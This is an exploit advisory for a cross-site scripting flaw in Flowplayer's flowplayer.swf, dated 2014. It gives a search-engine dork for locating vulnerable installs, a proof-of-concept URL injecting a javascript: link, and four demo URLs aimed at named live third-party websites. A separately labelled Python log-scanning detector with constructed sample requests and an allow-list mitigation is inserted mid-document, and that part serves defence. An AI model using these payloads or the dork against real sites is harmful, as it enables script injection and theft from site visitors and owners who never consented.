
Flowplayer (js & swf) XSS Vulnerability

Author: Muhammad Adeel , Published: 15-05-2014
# Flowplayer (js & swf) XSS Vulnerability
# Date: 15/5/14
# Vulnerability Risk: High
# Vulnerable Software: http://flowplayer.org/
# Dork : inurl:flowplayer/flowplayer.swf
# Author: Muhammad Adeel aka Innoxent Stoker
# Founder | Urdusecurity.blogspot.com

# Vulnerability

XSS (Cross-Site Scripting) is a vulnerability that involves either the web server or its clients. It is a high-risk vulnerability because it may lead to data theft and similar attacks.

# POC & Exploit

The XSS is in the flowplayer.swf "config" parameter: a "javascript:" URL supplied as the clip's "linkUrl" value is executed by the player.


http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4", "linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf
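From the defender's side, the useful thing to know is how to spot this request shape in access logs or at a WAF. The script below is an added example, not part of the original advisory or of Flowplayer's code: it takes a request URL for flowplayer.swf, percent-decodes the "config" query value, parses it as JSON, and flags any "linkUrl" whose scheme is not http or https. It normalises the scheme the way a browser does (leading whitespace and embedded tab/CR/LF removed, case-folded), so a mixed-case or tab-smuggled "javascript:" is still caught, and it walks the whole config so a link on a playlist entry is treated the same as one on the top-level clip (the playlist layout is an assumption here). Host names and request lines are constructed sample data.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Schemes a clip link legitimately needs; anything else on a linkUrl is flagged.
ALLOWED_LINK_SCHEMES = {"http", "https"}

# Textual fallback for configs that do not parse as JSON at all.
SCRIPT_SCHEME_RE = re.compile(r"(?i)(javascript|vbscript)\s*:")


def normalise_scheme(value: str) -> str:
    """Return the URL scheme as a browser would see it, or '' if there is none.
    Leading whitespace is stripped, embedded tab/CR/LF are dropped and the
    result is lower-cased, mirroring the browser's own URL pre-processing."""
    cleaned = re.sub(r"[\t\r\n]", "", value.strip()).lower()
    match = re.match(r"^([a-z][a-z0-9+.-]*):", cleaned)
    return match.group(1) if match else ""


def dangerous_link_urls(config_obj):
    """Collect every linkUrl in the parsed config whose scheme is not allowed.
    The config is walked generically (clip, playlist entries, nested objects)
    rather than assuming one fixed layout."""
    found = []

    def walk(node):
        if isinstance(node, dict):
            for key, val in node.items():
                if key == "linkUrl" and isinstance(val, str):
                    scheme = normalise_scheme(val)
                    if scheme and scheme not in ALLOWED_LINK_SCHEMES:
                        found.append(val)
                walk(val)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(config_obj)
    return found


def check_flowplayer_request(url: str) -> dict:
    """Classify one request URL; returns {'flagged': bool, 'reason': str}."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("flowplayer.swf"):
        return {"flagged": False, "reason": "not a flowplayer.swf request"}
    # parse_qs percent-decodes the value, so we get the raw JSON text back.
    for raw in parse_qs(parts.query).get("config", []):
        try:
            # strict=False keeps control characters smuggled into a string
            # (e.g. a tab inside "java\tscript:") from aborting the parse.
            cfg = json.loads(raw, strict=False)
        except ValueError:
            if SCRIPT_SCHEME_RE.search(raw):
                return {"flagged": True, "reason": "script scheme in malformed config"}
            continue
        bad = dangerous_link_urls(cfg)
        if bad:
            return {"flagged": True, "reason": "disallowed linkUrl scheme: " + bad[0]}
    return {"flagged": False, "reason": "clean"}


def scan_log(lines):
    """Return (line index, reason) for every flagged request line."""
    hits = []
    for i, line in enumerate(lines):
        verdict = check_flowplayer_request(line)
        if verdict["flagged"]:
            hits.append((i, verdict["reason"]))
    return hits


# Constructed sample request lines (example.com is a placeholder host).
SAMPLE_REQUESTS = [
    # benign: an ordinary http link target
    'http://example.com/js/flowplayer/flowplayer.swf?config={"clip":{"url":"http://example.com/intro.mp4","linkUrl":"http://example.com/promo"}}',
    # the advisory's PoC shape: a javascript: scheme in linkUrl
    'http://example.com/js/flowplayer/flowplayer.swf?config={"clip":{"url":"http://example.com/intro.mp4", "linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf',
    # percent-encoded, mixed-case scheme with a tab (%09) smuggled into it
    'http://example.com/js/flowplayer/flowplayer.swf?config=%7B%22clip%22%3A%7B%22url%22%3A%22http%3A%2F%2Fexample.com%2Fintro.mp4%22%2C%22linkUrl%22%3A%22JaVa%09ScRiPt%3Aconfirm(1)%22%7D%7D',
    # playlist layout with the link on an entry (layout is an assumption)
    'http://example.com/js/flowplayer/flowplayer.swf?config={"playlist":[{"url":"a.mp4","linkUrl":"vbscript:MsgBox(1)"}]}',
    # unrelated request that happens to carry a config parameter
    'http://example.com/index.html?config={"x":1}',
]

if __name__ == "__main__":
    for index, reason in scan_log(SAMPLE_REQUESTS):
        print(f"line {index}: {reason}")
```

The same check, applied server-side before a config object is handed to the player, is the corresponding mitigation: reject or drop any "linkUrl" whose normalised scheme is not in the allow list rather than trying to enumerate bad schemes.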


# Demo

http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4", "linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80, 111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101, 101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32, 83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101, 99));"}}&.swf


http://www.dancelessonsaustin.com/template/fredwoodlands/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


http://www.tier1personnel.com/template/default/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


https://housing.wwu.edu/include/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf
